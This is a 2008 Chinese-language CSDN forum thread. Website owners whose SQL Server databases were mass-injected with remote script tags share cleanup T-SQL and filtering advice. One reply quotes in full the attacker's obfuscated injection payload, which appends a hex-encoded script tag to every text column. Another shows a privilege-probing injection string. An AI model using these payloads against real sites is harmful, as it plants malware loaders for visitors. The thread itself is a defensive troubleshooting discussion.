首页 新闻 论坛 群组 Blog 文档 下载 读书 Tag 网摘 搜索 .NET Java 游戏 视频 人才 外包 培训 数据库 书店 程序员
中国软件网
欢迎您:游客 | 登录 注册 帮助
    • 急求解决办法!! 数据库字段里都被加了</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 10:33:47 楼主
    数据库字段里都被加了 </title>"> <script src=http://%61%31%38%38%2E%77%73/1.js> </script> <!

    查看: http://union.souyes.com/

    怎么解决,谢谢大家了,给点意见!
    20  修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 10:34:481楼 得分:0
    DECLARE @fieldtype sysname
    SET @fieldtype='varchar'

    --删除处理
    DECLARE hCForEach CURSOR GLOBAL
    FOR
    SELECT N'update '+QUOTENAME(o.name)
        +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ','' <script_src=http://ucmal.com/0.js> </script>'','''')'
    FROM sysobjects o,syscolumns c,systypes t
    WHERE o.id=c.id
        AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
        AND c.xusertype=t.xusertype
        AND t.name=@fieldtype
    EXEC sp_MSforeach_Worker @command1=N'?'
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 10:35:162楼 得分:0
    <script_src=http://ucmal.com/0.js>  </script>

    --

    改成你的那段
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 10:43:223楼 得分:0
    有什么防御的方法吗?

    被改以后有网页已经变成了这样了 http://mychinanews.com.cn/allinone_view_t1.asp?id=1797&tp_name=wh
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • dawugui
    • 等级:
    发表于:2008-05-07 11:50:574楼 得分:0
    数据库被注入攻击  所有文本型字下段数据都被加了    <script_src=http://ucmal.com/0.js> </script>
    怎么删掉?

    SQL code
    
DECLARE @fieldtype sysname
SET @fieldtype='varchar'

--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id 
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 11:54:285楼 得分:0
    引用 3 楼 slflys 的回复:
    有什么防御的方法吗?

    被改以后有网页已经变成了这样了 http://mychinanews.com.cn/allinone_view_t1.asp?id=1797&tp_name=wh


    龟就会贴上来
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • dawugui
    • 等级:
    发表于:2008-05-07 11:58:046楼 得分:0
    正在找.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • dawugui
    • 等级:
    发表于:2008-05-07 11:59:287楼 得分:0
    http://topic.csdn.net/u/20080504/20/763ed034-317a-4695-a476-26317b905012.html
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 15:00:028楼 得分:0
    楼上正解!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • sandyxxx
    • 等级:
    发表于:2008-05-07 15:38:359楼 得分:0
    </title> </pre>> <script src=h </title> </pre>> <script src=http://sb.5252.ws:88/107/1.js> </script> <

    我的数据库被注入了这个代码
    可是用上面的没法删除掉的
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zsjfd
    • 等级:
    发表于:2008-05-08 09:21:4810楼 得分:0
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-08 23:45:3511楼 得分:0
    至少直到现在还没有人能解决,郁闷中。。。
    俺已经被强奸N次了,呵呵
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 08:14:3812楼 得分:0
    郁闷阿,每天代码还不一样,期待中
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zsjfd
    • 等级:
    发表于:2008-05-09 09:02:5713楼 得分:0
    联系我,我刚解决了我的网站,QQ:120777717
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:18:2314楼 得分:0
    累死我了,日志太多了,这几天都是这个代码终于解决了,攻击者用的如下代码,我程序疏忽了一个问题,就是防注入的程序获得的代码只有小于255长度才判断的,结果他的代码长于255
    118544;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536312532452536422536312533342533372532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;--

    攻击者IP211.99.31.176
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:26:3215楼 得分:0
    楼上的大哥怎么解决的,教教我哈 ,谢谢了,呵呵
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:40:3616楼 得分:0
    我也如此,请告之解决办法..谢谢了.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:48:0917楼 得分:0
    引用 14 楼 yx8825 的回复:
    累死我了,日志太多了,这几天都是这个代码终于解决了,攻击者用的如下代码,我程序疏忽了一个问题,就是防注入的程序获得的代码只有小于255长度才判断的,结果他的代码长于255
    118544;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=…

    ' ¦ ¦and ¦( ¦) ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦% ¦chr ¦mid ¦master ¦truncate ¦char ¦declare这些字符过滤掉,再有注意大小写,不要限制长度就可以了
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zzyyc
    • 等级:
    发表于:2008-05-09 11:22:5218楼 得分:0
    发现最近sql 注入比较多,拿出来共享下,时长2小时。一次上传不了,分三次上传。免费共享。     
    《sql server 数据库的备份与恢复》 
    微软特约资深讲师 毛颉 


    http://topic.csdn.net/u/20080509/11/70ac59bd-d219-45c7-85ec-9d355398642c.html
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 11:34:3419楼 得分:0
    [引用 14 楼 yx8825 的回复:
    累死我了,日志太多了,这几天都是这个代码终于解决了,攻击者用的如下代码,我程序疏忽了一个问题,就是防注入的程序获得的代码只有小于255长度才判断的,结果他的代码长于255 
    118544;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=…

    ' ¦ ¦and ¦( ¦) ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦% ¦chr ¦mid ¦master ¦truncate ¦char ¦declare这些字符过滤掉,再有注意大小写,不要限制长度就可以了]


    高手能不能将完整的过滤代码发一份上来,谢谢了!!


    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 11:51:3920楼 得分:0
    我也碰到这样的问题,到底大侠们怎么解决拉,我每天都要恢复数据.每天都还进得来!!!!!
    代码我都看过没问题,但是他还能进来,
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 11:53:1421楼 得分:0
    大家能不能给具体的方法.多谢了;.烦心拉,
                徒弟我愚蠢.....
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 22:56:3822楼 得分:0
    上面的防SQL代码根本就不起作用,正确的解决方法:
    1。用存储过程进行数据的操作。
    2。不要用SA用户权限进行调用SQL,新建一个用户权限,只对存储过程进行权限分配。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zsjfd
    • 等级:
    发表于:2008-05-10 13:07:4923楼 得分:0
    楼上的这种方法是不行的,我之前的也一样,没有用SA用户,最后还是被注入了,解决的方法就是参数的过滤,有服务的可以查看IIS日志,查看不是不参数的注入,要过滤的关键字有:' ¦ ¦and ¦( ¦) ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦% ¦chr ¦mid ¦master ¦truncate ¦char ¦declare
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zsjfd
    • 等级:
    发表于:2008-05-10 13:19:1124楼 得分:0
    我是前两天数据库也被注入了,之前认为是服务的漏洞,最后查了,发现是参数注入的问题,在传参数时,注入者注入如下:hphoto_show.asp?hid=957 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1 ,NET的楼上的也说了,解决的方法是参数过滤:' ¦ ¦and ¦( ¦) ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦% ¦chr ¦mid ¦master ¦truncate ¦char ¦declare  ,如还有疑问请联系QQ:120777717
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-17 11:10:4325楼 得分:0
    http://blog.mdcsoft.cn/archives/200805/46.html  这个办法可以解决
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-18 21:31:0226楼 得分:0
    希望大家能不再受SQL注入的伤害,
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-18 23:00:4027楼 得分:0
    asp 的过滤代码函数哪位有的?
    修改 删除 举报 引用 回复
    网站简介广告服务网站地图帮助联系方式诚聘英才English 问题报告
    世纪乐知(北京)网络技术有限公司 版权所有 京 ICP 证 020026 号
    Copyright © 2000-2007, CSDN.NET, All Rights Reserved